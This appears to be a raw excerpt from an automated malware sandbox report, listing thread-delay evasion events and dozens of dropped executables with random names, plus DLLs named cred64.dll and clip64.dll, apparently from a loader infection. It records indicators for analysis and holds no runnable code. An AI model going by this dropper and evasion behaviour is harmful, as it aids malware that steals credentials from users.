Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595217
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594123
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593717
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 300000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593117
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 591496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 590804
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 589711
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 588630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 584595
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 583277
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 581637
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 580105
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 578479
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 576757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 574695
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 572735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 570520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 566034
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 563979
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 561729
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 559187
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 556505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 554105
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 549013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 545765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 542766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 539749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 536749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 531088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 527853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 524644
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 521393
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 517771
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 355523
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 268824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 267590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598784
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 300000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597014
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596592
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595904
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592777
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592085
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 590992
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 589911
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 585876
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 584558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 582918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 581386
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 579760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 578038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 575976
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 574016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 571801
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 567315
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 565260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 563010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 560468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 557786
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 555386
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 550294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 547046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 544047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 541030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 538030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 532369
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 529134
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 525925
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 522674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 519052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 343741
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window / User API: threadDelayed 1566	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3071	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1511	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Window / User API: threadDelayed 1340
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Window / User API: threadDelayed 1137
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Window / User API: threadDelayed 1112
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Window / User API: threadDelayed 1119
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Window / User API: threadDelayed 1142
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Window / User API: threadDelayed 1118
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Window / User API: threadDelayed 1153
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 353

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\JgoflcD9Q8N9LvT5krhponwA.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Ee4C8pygmuP2wWmHYlaPNRsj.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\g9ls6tmSqvqEPFEPMTLxj5T8.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\7cKVSqTv7NnDDL1Bxf0FokVy.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\A47mXAfrsBDpojX2UlRMyVjb.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\emoDG0nH5rlkVVnXgc1mj5b6.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001152001\DocuWorks.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\tH2mUUONokvK3vL8ubpXbilZ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\sx0rXq9mQR9aeLWBWHbPdr14.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\3Qu8OOESjPevn9hgYpoGckO6.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\JLiIrbSzLzOnR0erkK3iGyEU.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\uhjRBnwj8K4T9LYmtd6M66hw.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\wXamxKfyZPmwZrj3GYJOigy8.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\VxBZwWSDvyrtFfizMLyM1BzT.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\uuRE7gXsEM4RR1NoZUBwtrlp.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\hcidkkgbJV63mERAuLfsQa8h.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001142001\DocuWorks.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\DTvgIdE1FHJj9FUSxKWXL2RO.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\SN8aMZWrntrM7YJrmHS2jN15.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\6kv625NXRIyPYKeDaoPyctw3.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\RqikXgL90rwJFOFaZuJPlBKd.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\RoyNg8B8qjQgITKbssh3ShCc.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MnKGY5RWTeEWMNUxbLjGgu1v.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\HwwnZ3CpAQLjyKlmGEjpSgAe.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5ps.1.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Xi37RtmryfYQA7AgXeZvjKIg.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001108001\swiiii.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\erPoCjwbFUG1W9A8W6y3CW6b.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\zFwKnsnVeTcdv2qgWZnCYFfo.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\5t4J6LPx9worlCEV5lJ6PESB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\MpHOHCEEUzMhd1hQeZRzVhhz.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\itMidjIgtoMzghFLrzdYkPDa.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\3kkvcuaTSYv6zr1LL5n1fFGV.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\8UpBCIaVf6AAjxJPhsi6WXaA.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\1nTmHrERKdzkaXW6uWP0ApYm.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\SSO4jRyuUDShfiudMUcxy9PM.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\yUsmdV5pQCUMcoI7bnDHRZY9.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\2pxZ3QGs5RsdEF32wezepFbS.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\KaHPEM2tjHD1595lRxdfqHsL.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\wQWWfYa2Wpi02lLWRtocQHQR.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\QGd5vowLDGLbl9fCzFQRFDz6.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\sNUwctL7GkZ5u0NI0scxfcy0.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\TjI0ijcIo0xtphiVp90L9Ox0.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\UNI7mc4Nnga4yNCGVfbOvnYn.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\1YUCcdc2ns8K2t45poUN7Amx.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\HAM9LOmldo1zWlB6yIg4ket5.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\EobcTZAHsg9TkKb6ZiDxOQpo.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\OW0IY6qIxwA2vBNesoWOn7tx.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\9xT7E5Pb81hXRamadrxhTcKa.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\vSXx0NPQvyjoNMnvb7CbbdI3.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\tLniRa1wNfVBc8wtGlFeZuV5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\clip64[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\wZuV3PgWQZH6WkVb85MHgKez.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\iwNl8K5vXvEOpYcZRlgRArUI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\xEsbKulN7hG8EPnegeeycsh4.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\MSGhyVQl8QvU645EqnDaDG5h.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\ikwgyD2WNrub0XxL5g8QM7GI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\SYo7pMEIUYDach25xrEqQtfo.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\U56AmqiMe1O1Xr1D2Q9NTKco.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\vjbBGdKLPrfqevTO8NoyWGaS.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\e9BFbVGJvYbRX1O9pfx94p87.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\fbQkxrJoAES30cVcdBN8aXwZ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\DocuWorks[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\aCC9Y3uZiPILOE7CPQBm3dqe.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\XOhApkVOUtZE8u9vX17eosOR.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\ZM1H78lrEQNEMSqAF8jMSK2I.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sarra[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\HJ7xEP91cEUeBnkYZsutN6xz.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\o8Jx9jV1oAFDNGwS0JdA5742.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\6OLUTXGxeOohIVqZzcEJ5alb.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\iWlE1PLcvZdqKeIUsVDIfjKo.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\QgQgG9QxK6KBBiRO6TDiG08X.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Jow4Yx3Pjb1bpRyZH3KDPaVs.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\zkP3dJByFmLvW6zaaFPB4q1s.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\ULpJp44l4YgbS9xGxpGd4gFD.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\TB8gyY0giMN6fcZjZLzipP7P.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\1abyUXPEgy4bZxyXlnZFcHZ5.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Gp0jcfXPIousEInbW21jIMsf.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\b135cfRMuAwZwxqPJGvWitOU.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\jEBnyzNlpnxYBpX0SzTsilYc.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\5zJHpAJpIRB1HYZQQAYjkJ25.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\oLeePKVd7zLdWzK9yLk3y6uB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\duWjVWTrdvxVwAVHrNA8iMHG.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\NVX3Pk7yCVoYnwk8B8rP7BRQ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\NfgsIliNy2FIhgIHRMVtFDp6.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\bgw33Otai3n3FHEj79p4BuQd.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\0Tp94y9MBurxJFhItxZ95EWw.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\eRuQ9CSoyYCbA7kgv2O4hBGL.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\ZoBfdkTi1TzYd4Qho9RGiD49.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\zTSMwf6EqjBUbab8YHX1tAIc.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\GbMT76fl6mAPfbFsS3x29QL1.exe	Jump to dropped file
